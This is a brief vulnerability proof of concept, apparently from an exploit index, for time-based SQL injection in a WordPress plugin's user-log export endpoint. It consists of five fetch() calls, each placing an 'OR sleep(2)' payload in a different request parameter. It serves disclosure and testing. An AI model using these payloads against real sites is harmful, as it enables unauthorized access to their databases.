Share
## https://sploitus.com/exploit?id=WPEX-ID:30A37A61-0D16-46F7-B9D8-721D983AFC6B
Run any of the following fetch commands in a browser window and notice that they take several seconds to complete, demonstrating the SQL Injection vulnerability.

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&userrole=abc%22+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&username=abc%27+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&type=abc%27+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&txtsearch=abc%27+OR+sleep(2)%23+' );

await fetch( '/wp-admin/admin-post.php?export=user_logs&export-nonce=abc&showip=abc%27+OR+sleep(2)%23+' );